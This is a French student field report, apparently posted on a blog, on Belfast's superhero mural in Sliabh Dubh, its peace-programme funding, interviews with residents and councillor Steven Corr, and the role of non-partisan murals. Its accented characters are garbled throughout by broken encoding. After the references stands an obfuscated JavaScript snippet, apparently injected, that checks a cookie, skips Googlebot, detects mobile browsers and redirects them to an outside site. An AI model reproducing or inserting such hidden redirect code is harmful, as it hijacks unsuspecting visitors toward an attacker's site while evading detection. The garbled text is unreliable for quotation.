DonnA�es et Analyse

Nous allons prA�senter nos donnA�es par thA�matiques, regroupant ainsi des informations obtenues de diffA�rentes sources pour en faire le lien et les analyser en faisant ressortir des tendances.

1) Projet du mural:

[Informations rA�coltA�es avant le voyage] Le projet du mural des super-hA�ros date de 2013 et a A�tA� rA�alisA� par Danny Devenney, peintre rA�publicain spA�cialisA� en murals, avant quoi le mur abritait des graffitis. Le design de cette faA�ade a A�tA� imaginA� par les jeunes de la communautA� du quartier, et sa rA�alisation a A�tA� possible grA?ce au support de plusieurs organisations: the Housing Executive Sliabh Dubh Residents Association, the Fold Housing Association, the Black Mountain Shared Spaces Project et the Upper Springfield Development Forum1. Ces diffA�rentes associations de quartier ont toutes pour objectif une bonne cohA�sion sociale des habitants. Le programme du Building Relationships in Communities, appelA� BRIC, est celui qui a commandA� la rA�alisation de cette peinture, avec le but da��embellir les relations entre les habitants de la rA�gion, A�tant donnA� que le but premier de ce programme est celui de la��amA�lioration de relations entre diffA�rentes communautA�s de la��Irlande du Nord.
[DonnA�es da��entretien] La��aboutissement du projet du mural sur les super-hA�ros a rencontrA� quelques soucis. En effet, les opposants au mural soulignaient le fait que peindre une telle fresque tuerait la��histoire et que des reprA�sentations du conflit seraient plus A�ducatrices et bA�nA�fiques pour les enfants.

[Questionnaire aux passants] Ce mural A�tait destinA� aux enfants du quartier.

Analyse: Nous avons pu rA�colter les informations de factuelles en amont. Nous nous sommes aperA�u que, contrairement A� ce que la��on pensait a priori, les passant ne savait pas grand chose du mural des super-hA�ros. Du moins ca��est le cas des quatre personnes que nous avons eu la��occasion d’interroger. Sa��ils ne le savent pas pertinemment, les passants interrogA�s ont cependant la��air da��avoir compris que le mural des super-hA�ros est effectivement destinA� aux enfants. Pour ce qui est des donnA�es rA�coltA�es lors de la��entretiens avec le conseiller Steven Corr, nous sommes dans la��obligation de le croire sur parole faute da��avoir une confirmation de ses propos par un potentiel contestataire du projet.

2) Mural des super-hA�ros:

[Observations]

– AtmosphA?re: Les seuls points A� relever sont la permanence du bruit des voitures passant sur la route principale, se situant juste A� cA?tA� du mur, ainsi que les bavardages en provenance de la��A�cole du quartier.

Analyse: La��atmosphA?re relevA�e semble en accord avec les objectifs premiers de la rA�alisation du mural, A�tant donnA� la proximitA� da��une A�cole, qui garantit donc le passage da��enfants devant la fresque.

– Mesures: longueur da��environ 11m19.

Analyse: Ce mural est relativement long, par rapport A� da��autres fresques que nous avons eu la��occasion da��observer A� Belfast. Nous pouvons donc imaginer que ses dimensions augmentent son impact dans la��espace public.

– Situation du mural:

[Observation] Nous avons repA�rA� une fresque commA�morant les A�vA?nements du a�?Bloody Sundaya�? de 1972 A� quelques mA?tres derriA?re notre mural.
Nous avons A�galement dA�couvert, de la��autre cA?tA� de la rue et perpendiculairement A� notre mural, une fresque reprA�sentant des princesses Disney.
[Questionnaire aux passants] Le mural a A�tA� peint A� cet emplacement, car le quartier de Sliabh Dubh existe depuis une dizaine da��annA�es et est donc relativement rA�cent, et car la��A�cole primaire John Paul II se trouve aux alentours.
[DonnA�es da��entretien] Sliabh Dubh signifie a�?Black Mountaina�? en gaA�lique, en rA�fA�rence A� la colline se trouvant A� la��ouest du quartier. Avant de rA�cemment A?tre transformA�e en zone rA�sidentielle, une fabrique se situait lA� oA? se dresse aujourda��hui le quartier.

Analyse:
– Le mot a�?massacrea�? en lettres capitales est visible de loin depuis la route ainsi que depuis le quartier rA�sidentiel. Pour ces raisons, la mise en place du mural des super-hA�ros sur les murs de la��entrA�e dans Sliabh Dubh A� un impact da��autant plus fort, car la prA�sence de ces personnages mythiques pour les enfants apporte de la couleur au paysage, contrastant avec la prA�sence nA�gative et sombre du mot a�?massacrea�? non loin de lA�.
– Nous observons que la notion de la��A�cole primaire revient, ce qui signifie que notre supposition lors de la��observation de la��atmosphA?re du mural est vA�rifiA�e par la��un des habitants du voisinage.
– Le mural de princesses augmente considA�rablement la contribution de la reprA�sentation non-partisane dans la��espace public, de part ses aussi grandes dimensions que celui des super-hA�ros.

– a�?LA�gendea�? du mural: Une plaque figure dans le coin de la fresque, en haut A� gauche, stipulant: a�?Supported by bric programme through European Peace III programmea�?, et comportant A�galement les logos de chaque entitA� ayant participA� au projet de rA�alisation du mural.

Analyse: Le nom complet du programme est a�?EU Programme for Peace and Reconciliation in Northern Ireland and the Border Region of Irelanda�?, ce qui le rend pertinent avec notre sujet. De plus, il a A�tA� mis en action de 2007 A� 2013, sa fin coA?ncidant parfaitement avec la planification et rA�alisation du mural des super-hA�ros. Le but de ce programme A�tait de renforcer le progrA?s vers la paix et vers une sociA�tA� stable et de promouvoir la rA�conciliation entre les communautA�s da��Irlande du Nord. Le programme visait A� amA�liorer les relations communautaires au niveau local, tout en rendant compte du passA�, et crA�er des espaces publics ouverts et partagA�s. La spA�cificitA� de ce projet est le fait que son financement fut en partie opA�rA� par des association communautaires et des partis volontaires, qui A�taient ensuite libres de contacter la��autoritA� responsable de leur rA�gion pour mettre vie A� diffA�rents projets.
Le mural des super-hA�ros a donc A�tA� rA�alisA� A� des buts dA�passant le simple objectif de rendre heureux les enfants, comme ce que nous verrons plus loin, pensent les passants rencontrA�s.

3) La��impact du mural:

[DonnA�es da��entretien] Ce projet a la��avantage da��avoir permis aux jeunes de la communautA� de sa��exprimer da��une maniA?re semblable A� celle des peintres adultes.
[Questionnaire aux passants] Un de nos interrogA�s, un habitant du quartier, nous tA�moigna son ressenti da��une meilleure cohA�sion sociale depuis la prA�sence des deux murals dA�diA�s aux enfants dans le paysage. Il souligna A�galement que ce mur anciennement vierge na��A�tait pas respectA� par les enfants, qui jetaient leurs ballons dessus, na��y portant aucun intA�rA?t; fait complA?tement absent A� prA�sent que ce mur en question est recouvert de leurs idoles. Il nous fit part de son opinion sur le mural: grandir autour de fresques telles celle des super-hA�ros est bA�nA�fique pour les enfants, et la crA�ation de nouveaux murals semblables est, selon lui, un trA?s bon moyen de construire un meilleur avenir pour les futures gA�nA�rations.
Un autre de nos interviewA�s A�tait un homme du troisiA?me A?ge, accompagnA� de son petit fils. Ils na��habitaient pas le quartier, mais au Sud de Belfast, et se trouvaient lA�, A� prendre des photos, car ils avaient dA�couvert la��existence de ce mural dans un livre et que la��enfant exprima la��envie da��avoir des photos de soi-mA?me accompagnA� de ses hA�ros favoris.
Les impressions A�tant le plus ressorties sont le fait que le mur des super-hA�ros est trA?s apprA�ciA�.

Analyse: Avec un but de faire ressortir le ressenti gA�nA�ral des habitants sur la fresque et les effets de sa rA�alisation sur la communautA�, nous nous sommes basA�es sur une analyse comparative des rA�sultats du questionnaire, nous concentrant sur les points communs des rA�ponses de sorte A� en ressortir une tendance. Bien que nos rA�sultats ne peuvent A?tre gA�nA�ralisA�s, A�tant donnA� que notre A�chantillon na��est pas reprA�sentatif de la population, ils nous permettent tout de mA?me da��avoir une vague idA�e de la��impact social du mural A�tudiA�.

La��information A�tant le plus ressortie est le bA�nA�fice du mur des super-hA�ros pour les enfants du quartier; et nous pouvons affirmer qua��au travers du fait que des habitants de Belfast se dA�placent pour le voir, il est trA?s apprA�ciA� par les jeunes gA�nA�rations et constitue une attraction qui les attire.
Le respect de jeunes envers le mur pourrait A?tre considA�rA� comme le rA�sultat da��un impact A�ducatif de ce mural.

4) RA�gion de Ballymurphy:

[Entretien] Il existe un projet en cours visant A� relancer la��A�conomie du quartier par la construction da��un nouvel hA?tel destinA� aux touristes A� cA?tA� du cimetiA?re de Ballymurphy, de sorte A� crA�er des emplois pour les habitants des environs.
La zone de Ballymurphy observe dA�jA� depuis un bon moment des problA?mes de drogue et de suicide. Actuellement, deux projets de murals sont en cours et ont comme thA?me le suicide et comme objectif sa prA�vention. A�Children can spell better the word suicide than the word happinessA�, qui veut dire a�?Les enfants savent mieux A�peler le mot suicide que le mot bonheura�?.
Lors du tour de la rA�gion avec le conseiller, nous avons dA�couvert un mural relativement long sur Beechmount Avenue. Celui-ci est recouvert de portraits de victimes catholiques assassinA�es durant le conflit. Juste en face se trouve un mA�morial aux morts ayant pris directement part au conflit et A�tant pour la plupart membres de la��IRA. Steven Corr nous prA�cisa qua��un tel mural a une forte influence psychologique sur les enfants passant devant tous les jours sur leur trajet scolaire. Ce phA�nomA?ne avait A�tA� sa principale motivation pour soutenir le projet da��un mur non-partisan, dont le contenu serait choisi par les enfants et donc beaucoup plus joyeux et positif pour leur moral qua��un nouveau mural traitant du conflit de Belfast. Il a aussi A�tA� inspirA� par la citation de Bobby Sands prA�sente sur le trottoir da��en face du mural a�?MURDEREDa�?. Celle-ci dit: A�Our revenge will be the lauther of our childrenA�, qui en franA�ais veut dire a�?notre vengeance sera le rire de nos enfantsa�?.

Analyse: La��inquiA�tude des habitants de Belfast pour les futures gA�nA�rations tend A� beaucoup ressortir lors de discussions avec eux. En effet, nous pouvons nous poser la question de la��impact du conflit sur les enfants et des mesures prises pour le minimiser. Notre hypothA?se initiale, comme quoi la��art non-partisan serait un moyen da��attA�nuer la��hA�ritage nA�gatif du conflit, est corroborA�e par le discours du conseiller. Cela dit, ce postulat ne peut A?tre A�tendu A� da��autres personnes, A�tant donnA� l’absence de donnA�es supplA�mentaires A� ce sujet.
Le mot a�?MURDEREDa�? A�crit en rouge et en gras parsA?me le mural de Beechmount Avenue, A�tant A�crit sous chacune des photos et sautant directement aux yeux, scandalisant les A�vA?nements auxquels le mural rA�fA?re. Nous observons un phA�nomA?ne de glorification des hA�ros de guerre et de dA�nigrement des loyalistes, considA�rA�s ici comme des meurtriers de masse. La rue sur laquelle se situe ce mural a, de part le mA�morial se situant en face et la mise en avant des A�vA�nements macabres, un aspect de cimetiA?re et de lieu de mA�moire tragique.

5) ThA�matique du non-partisan:

[Questionnaire aux passants] Selon la��un de nos interrogA�s, les murals de Belfast traitant du conflit sont trA?s A�ducatifs et ne devraient en aucun cas A?tre retirA�s.

[DonnA�es da��entretien] La destruction da��un mural tel que celui des portraits a�?MURDEREDa�? aurait un impact chaotique auprA?s de la communautA�, car les visages sur ce mur sont familiers et appartiennent A� des personnes que les habitants ont rA�ellement connu. Le fait de garder ce genre de reprA�sentation macabre serait donc un moyen de perpA�tuer la gloire de ces victimes et da��A�vier des effusions de violence, ainsi qua��un outrage gA�nA�ral.
Le point fort da��un mural tel que celui des super-hA�ros serait, pour le conseiller, le fait qua��il apporte de la joie et de la��espoir aux nouvelles gA�nA�rations; en contraste avec les reprA�sentations dA�nonA�ant les loyalistes comme les coupables absolus de la mort da��un grand nombre de victimes.
Nous avons A�galement appris lors de cet entretien que chaque rA�gion sa��occupe des murals qui sont dans ses dA�limitations. Les fresques peintes sur les murs sont soit financA�es par le ministA?re, soit par des associations ou des groupes da��art. La mairie na��est aucunement inclue dans aucun projet de mural et aucune demande na��a besoin de lui A?tre formulA�e pour la crA�ation de nouvelles fresques.
Steven Corr nous a appris que les murals non partisans constituent 10% de ceux de Belfast et se situent dans des quartiers pA�riphA�riques, comme Sliabh Dubh. Cette politique de crA�ation de murals na��ayant aucun rapport direct avec le conflit entre les rA�publicains et les loyalistes consiste A� mettre en avant la culture et le sports. Il nous a expliquA�es qua��il ne sa��agit pas d’effacer la��histoire, mais de mettre en valeur da��autres aspects de Belfast dont les citoyens peuvent A?tre fiers et qui ne suscitent pas une A�motion qui engendrerait des actes de violence. La localisation des muraux non partisans est choisie principalement au hasard, selon les lieux oA? il y a de la place.
Lors du tour, nous avons A�galement A�tA� amenA�es devant une fresque non partisanne, sur Beechview Park, nommA�e Olympic medal winner, reprA�sentant le Titanic et les jeux olympiques. Steven Corr nous apprend que la peinture de cette fresque a coA�tA� six milles livres sterling; fait dA�concertant lorsque la��on observe son A�tat da��aujourda��hui. Le mural A� A�tA� vandalisA� et des graffitis le recouvrent A� de multiples endroits.

Analyse: Nous pouvons faire un lien avec ce qui a A�tA� dit lors de la confA�rence de Naomi Doak et de Robert Heslip sur la politique touristique mise en place par la municipalitA� de Belfast, les questions d’hA�ritage du conflit et le dark tourism (voir article ConfA�rence sur le tourisme: Quel avenir pour Belfast?); le problA?me qui rA�side avec les murals non-partisans est qua��ils sont contradictoires avec la promotion du dark tourism de la ville de Belfast, car ils effacent le passA� conflictuel pour lequel les touristes viennent visiter les lieux. En revanche, ce nouveau type de murals est en accord avec la promotion du a�?phoenix tourisma�? que la municipalitA� essaye de mettre en avant, dans le but de montrer un aspect plus positif de la ville.
Nous observons une tendance des habitants A� penser que les murals traitant du conflit sont A�ducatifs et mA�ritent leur place dans la vie des nouvelles gA�nA�rations grandissantes, A�tant donnA� qua��ils rendent compte de la��histoire de leur patrie.
De plus, nous observons chez le dirigeant de la rA�gion de Ballymurphy une volontA� de mettre en avant des aspects de la ville autres que ceux du conflit, auxquels chaque habitant pourrait sa��identifier sans ressentir de la haine.

Pour ce qui est du mural Olympic medal winner, nous avons eu la confirmation qua��il a A�tA� peint pour la paix et illustrer da��autres symboles de fiertA� auxquelles les belfastois peuvent sa��identifier. Il entre donc bel et bien dans le registre des murals non-partisans pour une meilleur cohA�sion sociale2.


6) Politique du conseiller:

[DonnA�es da��entretien] Steven Corr essaye da��appuyer les projets de peinture de tous types de murals, principalement dans la��optique de lA�guer un patrimoine plus joyeux aux nouvelles gA�nA�rations tout en perpA�tuant la mA�moire des conflits de Belfast. Il nous a informA�es qua��il organise chaque A�tA�, en aoA�t, un festival A� Belfast pour les enfants: A�kids partyA�, oA? figurent barbecues et jeux. Le but de ce festival serait da��apporter une meilleure cohA�sion dans le quartier, ce qui nous amA?ne A� la tactique du conseiller pour dA�passer le conflit: faire en sorte que les enfants ne se sentent plus concernA�s par celui-ci.
Il faudrait, da��aprA?s lui, essayer de concilier les projets historiques avec les culturels, car les rA�gions oA? se trouvent les murals sont principalement des rA�gions de dA�pression sociale.

Analyse: Gardant en tA?te le fait que ce genre de discours est typique da��un agent politique et pourrait A�ventuellement figurer dans sa campagne, nous pouvons tout de mA?me dire que cette diversitA� a une chance de promouvoir les murals non-partisans dans la rA�gion de Ballymurphy. De plus, nous avons pu observer, en voyant notre interviewA� interagir avec des passants, qua��il est effectivement proche de sa communautA�, et de par son attitude familiA?re lors de notre entretien, nous pouvons dire sans trop nous avancer qua��il est fortement investi dans son domaine politique.

[1]A�HousingExclusive (18 dA�cembre 2013), Art project has super impact on community spirit, [En ligne] URL:A�http://www.nihe.gov.uk/news-art-project-has-super-impact-on-community-spirit

[2]A�Beyond the Walls (2012), Olympic Medal Winners, [En ligne] URL:A�http://beyondthewallsthefilm.com/portfolio/arabeh-prisoner-mural/

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *